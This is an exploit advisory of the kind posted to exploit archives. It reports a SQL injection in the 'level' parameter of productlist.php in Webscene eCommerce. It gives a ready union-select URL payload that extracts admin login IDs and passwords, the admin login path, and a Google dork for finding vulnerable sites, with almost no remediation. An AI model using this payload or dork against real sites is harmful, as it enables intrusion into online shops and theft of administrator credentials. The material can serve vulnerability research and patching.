################################################################################# # # Webscene eCommerce (level) Remote Sql Injection # # vendor : http://www.webscenesolutions.com/ecommerce-shopping-websites-edinburgh.htm # ################################################################################# # # # Bug Found By :Angela Chang (14-10-2008) # # contact: angel[at]ch4ng.cc # # ################################################################################ # # # Greetz: nyubi & Vrs-Chk # # ############################################################################### vuln file : productlist.php Input passed to the "level" is not properly verified before being used. This can be exploited to execute remote sql injection. exploit : http://somehost/productlist.php?categoryid=20&level=[sql] http://somehost/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from adminuser-- Login admin : http://somehost/admin/ Google dork : inurl:productlist.php?categoryid= level ######################################################################## __ _ _ _ __ _ __ _ _ _ / _` | ___ | | __ _ o O O __ | |_ __ _ _ _ / _` | / _` | | ' \ \__, | / -_) | | / _` | o / _| | ' \ / _` | | ' \ \__, | \__,_| |_||_| |___/ \___| _|_|_ \__,_| TS__[O] \__|_ |_||_| \__,_| |_||_| |___/ _|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| {======|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'./o--000'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'